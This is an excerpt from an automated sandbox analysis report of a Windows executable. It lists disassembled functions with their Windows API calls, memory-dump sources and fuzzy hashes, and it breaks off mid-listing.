                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F5C8C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: 9b4d120b8b2c0d221ccdca937d142b9352cefdad1989b013df5109b22fea4493
                                    • Instruction ID: 7be312a1359ad279fc3e46ced3a45c8f42a1bbe046e91587e34d921e6afef674
                                    • Opcode Fuzzy Hash: 9b4d120b8b2c0d221ccdca937d142b9352cefdad1989b013df5109b22fea4493
                                    • Instruction Fuzzy Hash: BC513F71F00209AFDF18CF69DD89AAEBBB6EB88311F14812DFA16D6290D7709D449B50
                                    Function 00F021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • GetSysColor.USER32(0000000F), ref: 00F021D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: a527f93261a4ff10be148898c10e8b980abb53828b1fb26401af63da6fd0ea55
                                    • Instruction ID: f8c89c5502b19c6b57842a544a71513d4d0c115bd85dd50c1d2afc433c098440
                                    • Opcode Fuzzy Hash: a527f93261a4ff10be148898c10e8b980abb53828b1fb26401af63da6fd0ea55
                                    • Instruction Fuzzy Hash: C941BF31400544AFEB615F68EC8CBB93B66EB46331F284265FD65CA1E2C7318C86FB61
                                    Function 00F6AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,00F8F910), ref: 00F6AB76
                                    • GetDriveTypeW.KERNEL32(00000061,00FBA620,00000061), ref: 00F6AC40
                                    • _wcscpy.LIBCMT ref: 00F6AC6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    • Opcode ID: 7b8b6076d110fc05eb2d6a3bb93f1e760d4cb26ab2cacd091a401cbc33b540fc
                                    • Instruction ID: 95b53b8947246438841e434ae8604f143489f8965ae57f7983df3964896352c0
                                    • Opcode Fuzzy Hash: 7b8b6076d110fc05eb2d6a3bb93f1e760d4cb26ab2cacd091a401cbc33b540fc
                                    • Instruction Fuzzy Hash: A1519A316083029FC710EF14CC81AAEB7A5EF85710F544829F496A72E2EB75E949FE53
                                    Function 00F09997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __i64tow__itow__swprintf
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 421087845-2263619337
                                    • Opcode ID: dd191652cceb4cfc4c9538a1f3bd4bab4f34c5b08234060e35422c900de47f7e
                                    • Instruction ID: 6274a55374b9f0aa37075b31339221aa5f66d3973b0c9b73d1bbde95a65fce43
                                    • Opcode Fuzzy Hash: dd191652cceb4cfc4c9538a1f3bd4bab4f34c5b08234060e35422c900de47f7e
                                    • Instruction Fuzzy Hash: AD41E672A08219AFDB24EB74DC42F7673E8EB04320F20446EE549D72D2EA759945BB11
                                    Function 00F873C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F873D9
                                    • CreateMenu.USER32 ref: 00F873F4
                                    • SetMenu.USER32(?,00000000), ref: 00F87403
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F87490
                                    • IsMenu.USER32(?), ref: 00F874A6
                                    • CreatePopupMenu.USER32 ref: 00F874B0
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F874DD
                                    • DrawMenuBar.USER32 ref: 00F874E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                    • String ID: 0$F
                                    • API String ID: 176399719-3044882817
                                    • Opcode ID: 9b4837906021a7d627ba129ab60f1455ee6fb14e135209ca03c27dba3603af4f
                                    • Instruction ID: f6ae44e15d5da125114b93cc2cdd56904afe2ae48557562cbf0d636c906b2484
                                    • Opcode Fuzzy Hash: 9b4837906021a7d627ba129ab60f1455ee6fb14e135209ca03c27dba3603af4f
                                    • Instruction Fuzzy Hash: 9E413875A04349EFDB10EF64D888FEABBB5FF49310F244029E955A7360D731A914EB60
                                    Function 00F8772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F877CD
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00F877D4
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F877E7
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F877EF
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F877FA
                                    • DeleteDC.GDI32(00000000), ref: 00F87803
                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F8780D
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F87821
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F8782D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: 02c1c0a4ea27f3c58f5188fd208c2ae7b6fb5686d09a7de9ac2a76ccce0a0c24
                                    • Instruction ID: 835ad51c74b5e7741299be00ec25ddac9f6c05eba4c1c334b63c6dc5b954fd5e
                                    • Opcode Fuzzy Hash: 02c1c0a4ea27f3c58f5188fd208c2ae7b6fb5686d09a7de9ac2a76ccce0a0c24
                                    • Instruction Fuzzy Hash: BC316B32505219AFDF11AFA4DC09FEA3B69FF49320F210224FA15E60A0D735D825EBA4
                                    Function 00F27040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F2707B
                                      • Part of subcall function 00F28D68: __getptd_noexit.LIBCMT ref: 00F28D68
                                    • __gmtime64_s.LIBCMT ref: 00F27114
                                    • __gmtime64_s.LIBCMT ref: 00F2714A
                                    • __gmtime64_s.LIBCMT ref: 00F27167
                                    • __allrem.LIBCMT ref: 00F271BD
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F271D9
                                    • __allrem.LIBCMT ref: 00F271F0
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F2720E
                                    • __allrem.LIBCMT ref: 00F27225
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F27243
                                    • __invoke_watson.LIBCMT ref: 00F272B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                    • Instruction ID: e1ac86aee3cb108f62f46e68beb5cac8768a1de8a488d9dad94d04b4e5315653
                                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                    • Instruction Fuzzy Hash: 9871E772E04726EBD714EE79DC42B5BB3A8AF11370F14422AF514E72C1E774E944AB90
                                    Function 00F62A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F62A31
                                    • GetMenuItemInfoW.USER32(00FC6890,000000FF,00000000,00000030), ref: 00F62A92
                                    • SetMenuItemInfoW.USER32(00FC6890,00000004,00000000,00000030), ref: 00F62AC8
                                    • Sleep.KERNEL32(000001F4), ref: 00F62ADA
                                    • GetMenuItemCount.USER32(?), ref: 00F62B1E
                                    • GetMenuItemID.USER32(?,00000000), ref: 00F62B3A
                                    • GetMenuItemID.USER32(?,-00000001), ref: 00F62B64
                                    • GetMenuItemID.USER32(?,?), ref: 00F62BA9
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F62BEF
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62C03
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62C24
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: 784ed760c217f9ccddccd86461f9817e8bb2f312475e03af6e9f062e5048fa3b
                                    • Instruction ID: 5534e76cb88e3885f08ce8edb34c2a8d31fe5a1f1ab125ffab64a79c46aae367
                                    • Opcode Fuzzy Hash: 784ed760c217f9ccddccd86461f9817e8bb2f312475e03af6e9f062e5048fa3b
                                    • Instruction Fuzzy Hash: 2C61D0B1900649AFDF61CFA4CD88EFE7BB8EB41324F140469E84197291D775AD09FB20
                                    Function 00F87192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F87214
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F87217
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F8723B
                                    • _memset.LIBCMT ref: 00F8724C
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F8725E
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F872D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 3ac2c355c34678b3bfa49b366102442e36c30c0893bc678063eb0269bb681553
                                    • Instruction ID: 1ee01d92995fb71124a1bdfcf5874ebe7e814bc1ddfb2c22b357d1a307d8a73a
                                    • Opcode Fuzzy Hash: 3ac2c355c34678b3bfa49b366102442e36c30c0893bc678063eb0269bb681553
                                    • Instruction Fuzzy Hash: F1616971A04208AFDB10EFA4CD85FEE77B8EF09714F240169FA14E72A1D774A945EB60
                                    Function 00F5710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F57135
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00F5718E
                                    • VariantInit.OLEAUT32(?), ref: 00F571A0
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F571C0
                                    • VariantCopy.OLEAUT32(?,?), ref: 00F57213
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F57227
                                    • VariantClear.OLEAUT32(?), ref: 00F5723C
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00F57249
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F57252
                                    • VariantClear.OLEAUT32(?), ref: 00F57264
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F5726F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: e9d7f46ab0d8409fc1057283ddd6b88ec3a2c3f5e76c4a2c640e881a2762be53
                                    • Instruction ID: 1a71613d422f1e0ea456e7a8e3e3e82f142c4bc4c3665dddedc30f084caf4bb9
                                    • Opcode Fuzzy Hash: e9d7f46ab0d8409fc1057283ddd6b88ec3a2c3f5e76c4a2c640e881a2762be53
                                    • Instruction Fuzzy Hash: 1E414035A04219AFCB00EF65DC449EEBBB9FF08355F008069FA55E7261DB34A949EF90
                                    Function 00F75A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WS2_32(00000101,?), ref: 00F75AA6
                                    • inet_addr.WS2_32(?), ref: 00F75AEB
                                    • gethostbyname.WS2_32(?), ref: 00F75AF7
                                    • IcmpCreateFile.IPHLPAPI ref: 00F75B05
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F75B75
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F75B8B
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F75C00
                                    • WSACleanup.WS2_32 ref: 00F75C06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 78d1715ae2ae8bae478e86212a07aabc3ead31ce4f9024685c8b1507397e541c
                                    • Instruction ID: ed8624958a723ef7a9009d4193daae7837375d082a62a8192574a4963b077a75
                                    • Opcode Fuzzy Hash: 78d1715ae2ae8bae478e86212a07aabc3ead31ce4f9024685c8b1507397e541c
                                    • Instruction Fuzzy Hash: DF5162716047009FD7119F28CC45B7A77E4EF88B20F14892AF559DB2E1DBB4D844BB42
                                    Function 00F6B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00F6B73B
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F6B7B1
                                    • GetLastError.KERNEL32 ref: 00F6B7BB
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00F6B828
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 59efa5b527edee0bc6b5a94d4474dcdd363618d4ea5e7bb5f3cd53406b1c2ad5
                                    • Instruction ID: cd5751f3553c9aef5cb22c9108a17f165318caf97accc05fcebf4913f5930990
                                    • Opcode Fuzzy Hash: 59efa5b527edee0bc6b5a94d4474dcdd363618d4ea5e7bb5f3cd53406b1c2ad5
                                    • Instruction Fuzzy Hash: 7F318E35A00209AFDB10EF64DC89AFE7BB8EF84710F14402AE506D7292DB759986FB51
                                    Function 00F59471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F594F6
                                    • GetDlgCtrlID.USER32 ref: 00F59501
                                    • GetParent.USER32 ref: 00F5951D
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F59520
                                    • GetDlgCtrlID.USER32(?), ref: 00F59529
                                    • GetParent.USER32(?), ref: 00F59545
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F59548
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: 2a12fa35a5fb2bc3c54024119fa07cf3396696bd8a5e2d9666f3af53b5785ecd
                                    • Instruction ID: 956fcda83d5bb28ba56a4bff1542d95e8b133db074ac2d4733f37e54724013c0
                                    • Opcode Fuzzy Hash: 2a12fa35a5fb2bc3c54024119fa07cf3396696bd8a5e2d9666f3af53b5785ecd
                                    • Instruction Fuzzy Hash: A921E574E04208AFCF05AB61CC85DFEB7A4EF49310F104155BA21572E1EBB9591DBB20
                                    Function 00F5955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00F5B0E7
